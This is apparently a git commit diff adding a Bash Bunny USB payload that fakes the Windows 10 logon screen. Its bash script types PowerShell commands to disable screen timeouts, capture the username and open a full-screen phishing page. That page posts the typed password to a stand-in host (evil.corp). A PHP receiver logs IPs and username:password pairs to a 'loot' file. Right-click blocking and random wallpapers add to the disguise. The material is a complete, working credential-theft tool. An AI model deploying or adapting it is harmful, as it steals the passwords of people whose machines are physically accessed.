Merge branch 'hak5:master' into master
|
@ -0,0 +1,66 @@
|
|||
# "Microsoft Windows 10" Fake Logon Screen
|
||||
|
||||
- Title: "Microsoft Windows 10" Fake Logon Screen
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Microsoft Windows 10
|
||||
- Category: Phishing
|
||||
|
||||
## Description
|
||||
|
||||
1) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||
2) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||
3) Retrieve the current username.
|
||||
4) Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
|
||||
5) The "Bash Bunny" can be removed because the files are cached in the web browser.
|
||||
6) The password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
|
||||
|
||||
## Configuration
|
||||
|
||||
From "payload.txt" change the values of the following constants :
|
||||
```bash
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
|
||||
readonly INPUT_PLACEHOLDER="Password"
|
||||
|
||||
|
||||
```
|
||||
|
||||
Example of code for the data receiver :
|
||||
```php
|
||||
<?php
|
||||
|
||||
if (
|
||||
$_SERVER['REQUEST_METHOD'] === 'POST' &&
|
||||
isset($_POST['username']) && !empty($_POST['username']) &&
|
||||
isset($_POST['password']) && !empty($_POST['password'])
|
||||
) {
|
||||
|
||||
$remote_addr = (string) $_SERVER['REMOTE_ADDR'];
|
||||
$user_agent = (string) $_SERVER['HTTP_USER_AGENT'];
|
||||
$username = (string) $_POST['username'];
|
||||
$password = (string) $_POST['password'];
|
||||
|
||||
/*
|
||||
touch ./aGFrNQ_loot.log
|
||||
chown www-data:www-data ./aGFrNQ_loot.log
|
||||
*/
|
||||
$loot = fopen('aGFrNQ_loot.log', 'a');
|
||||
fwrite($loot, "##\n");
|
||||
fwrite($loot, $remote_addr . "\n");
|
||||
fwrite($loot, $user_agent . "\n");
|
||||
fwrite($loot, $username . ':' . $password . "\n");
|
||||
fwrite($loot, "##\n");
|
||||
fclose($loot);
|
||||
|
||||
}
|
||||
|
||||
http_response_code(302);
|
||||
header('Location: https://hak5.org/');
|
||||
exit;
|
||||
|
||||
?>
|
||||
```
|
|
@ -0,0 +1,121 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: "Microsoft Windows 10" Fake Logon Screen
|
||||
#
|
||||
# Description:
|
||||
# 1) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||
# 2) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||
# 3) Retrieve the current username.
|
||||
# 4) Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
|
||||
# 5) The "Bash Bunny" can be removed because the files are cached in the web browser.
|
||||
# 6) The password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Phishing
|
||||
# Target: Microsoft Windows 10
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
||||
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||
#
|
||||
# NOTE
|
||||
# ===============
|
||||
# Target computer with a single screen.
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Yellow quadruple blink .......................... STAGE4
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
#
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
|
||||
readonly INPUT_PLACEHOLDER="Password"
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
Q DELAY 8000
|
||||
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
||||
Q DELAY 8000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
Q STRING "CD \"\${BB_VOLUME}\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
# Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||
#
|
||||
Q STRING "(powercfg /Change monitor-timeout-ac 0); (powercfg /Change monitor-timeout-dc 0)"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
# Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
|
||||
#
|
||||
Q STRING "(powercfg /Change standby-timeout-ac 0); (powercfg /Change standby-timeout-dc 0)"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
# Retrieve the current username.
|
||||
#
|
||||
Q STRING "\"const CURRENT_USERNAME = '\$([Environment]::UserName)';\" | Out-File -FilePath ./TMP.js"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "\"const DROP_URL = '${DROP_URL}';\" | Out-File -FilePath ./TMP.js -Append"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "\"const INPUT_PLACEHOLDER = '${INPUT_PLACEHOLDER}';\" | Out-File -FilePath ./TMP.js -Append"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE4
|
||||
|
||||
# Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
|
||||
#
|
||||
Q STRING "(Invoke-Expression .\\phishing_files\\index.html); exit"
|
||||
Q ENTER
|
||||
Q DELAY 9000
|
||||
Q TAB
|
||||
Q DELAY 2000
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
sync
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
# The "Bash Bunny" can be removed because the files are cached in the web browser.
|
||||
#
|
||||
shutdown -h 0
|
|
@ -0,0 +1,16 @@
|
|||
body {
|
||||
min-height: 100vh;
|
||||
background-size: cover;
|
||||
background-repeat: no-repeat;
|
||||
background-position-x: center;
|
||||
background-position-y: center;
|
||||
}
|
||||
|
||||
.login {
|
||||
min-width: 42px;
|
||||
background-image: url("./../img/submit.png");
|
||||
background-size: cover;
|
||||
background-repeat: no-repeat;
|
||||
background-position-x: center;
|
||||
background-position-y: center;
|
||||
}
|
|
@ -0,0 +1,13 @@
|
|||
@font-face {
|
||||
font-family: "text-security-disc";
|
||||
src: url("./../font/text-security-disc.ttf") format("truetype");
|
||||
}
|
||||
|
||||
body, .password::placeholder {
|
||||
font-family: "Segoe UI";
|
||||
font-weight: lighter;
|
||||
}
|
||||
|
||||
.password {
|
||||
font-family: "text-security-disc";
|
||||
}
|
After Width: | Height: | Size: 624 B |
After Width: | Height: | Size: 1.0 KiB |
After Width: | Height: | Size: 2.5 KiB |
After Width: | Height: | Size: 1.4 KiB |
After Width: | Height: | Size: 9.0 KiB |
After Width: | Height: | Size: 980 KiB |
After Width: | Height: | Size: 1.5 MiB |
After Width: | Height: | Size: 3.2 MiB |
After Width: | Height: | Size: 1.4 MiB |
After Width: | Height: | Size: 36 KiB |
After Width: | Height: | Size: 808 KiB |
|
@ -0,0 +1,4 @@
|
|||
document.querySelector('div#username').innerText = CURRENT_USERNAME;
|
||||
document.querySelector('#drop').action = DROP_URL;
|
||||
document.querySelector('input#username').value = CURRENT_USERNAME;
|
||||
document.querySelector('.password').placeholder = INPUT_PLACEHOLDER;
|
|
@ -0,0 +1,9 @@
|
|||
function fullscreen() {
|
||||
let document_element;
|
||||
document_element = document.documentElement;
|
||||
document.querySelector('#fullscreen').style.display = "none";
|
||||
if (document_element.requestFullscreen) {
|
||||
document_element.requestFullscreen();
|
||||
document.querySelector('.password').focus();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,9 @@
|
|||
const WALLPAPERS = [
|
||||
'abstact-nature.jpg',
|
||||
'beach-cave.jpg',
|
||||
'mountains-lake.png',
|
||||
'sea-airplain.png',
|
||||
'solid-blue.jpg',
|
||||
'windows-light.jpg'
|
||||
];
|
||||
document.querySelector('body').style.backgroundImage = ('url("./assets/img/wallpapers/' + (WALLPAPERS.sort(() => Math.random() - 0.5)[0]) + '")');
|
|
@ -0,0 +1,7 @@
|
|||
window.addEventListener(
|
||||
'contextmenu',
|
||||
function(e) {
|
||||
e.preventDefault();
|
||||
},
|
||||
false
|
||||
);
|
|
@ -0,0 +1,47 @@
|
|||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8" />
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1" />
|
||||
<link rel="stylesheet" type="text/css" href="./assets/css/backgrounds.css?v=1.0.0" />
|
||||
<link rel="stylesheet" type="text/css" href="./assets/css/fonts.css?v=1.0.0" />
|
||||
<link rel="stylesheet" type="text/css" href="./assets/framework/bootstrap.min.css?v=5.1.3" />
|
||||
<title></title>
|
||||
</head>
|
||||
<body>
|
||||
<main class="container-fluid">
|
||||
<section class="row">
|
||||
<div class="col-3" style="min-height: 100vh;">
|
||||
<button id="fullscreen" onclick="fullscreen();">fullscreen</button>
|
||||
</div>
|
||||
<div class="col-6 align-self-center text-center">
|
||||
<img class="img-fluid opacity-75" src="./assets/img/user.png" title="" />
|
||||
<div class="h2 my-3 text-white" id="username">User</div>
|
||||
<div class="row">
|
||||
<div class="col-6 offset-3">
|
||||
<form method="POST" id="drop">
|
||||
<div class="input-group">
|
||||
<input class="d-none" id="username" type="text" name="username" />
|
||||
<input class="form-control password" type="text" name="password" autocomplete="off" placeholder="Password" required />
|
||||
<button class="btn opacity-75 login" type="submit"></button>
|
||||
</div>
|
||||
</form>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div class="col-3" style="min-height: 100vh;">
|
||||
<div class="position-absolute bottom-0 end-0">
|
||||
<img class="img-fluid mx-2 my-3" style="width: 45px;" src="./assets/img/icons/worldwide.png" title="" />
|
||||
<img class="img-fluid mx-2 my-3" style="width: 45px;" src="./assets/img/icons/network.png" title="" />
|
||||
<img class="img-fluid ms-2 me-3 my-3" style="width: 45px;" src="./assets/img/icons/power.png" title="" />
|
||||
</div>
|
||||
</div>
|
||||
</section>
|
||||
</main>
|
||||
<script type="text/javascript" src="./../TMP.js"></script>
|
||||
<script type="text/javascript" src="./assets/js/fullscreen.js?v=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/rightclick.js?v=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/randomwall.js?v=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/dispatch.js?v=1.0.0"></script>
|
||||
</body>
|
||||
</html>
|
|
@ -6,7 +6,7 @@
|
|||
# Target: Windows 7
|
||||
# Attackmodes: HID
|
||||
|
||||
ATTACMODE HID
|
||||
ATTACKMODE HID
|
||||
|
||||
###### OPTIONS #######
|
||||
|
||||
|
|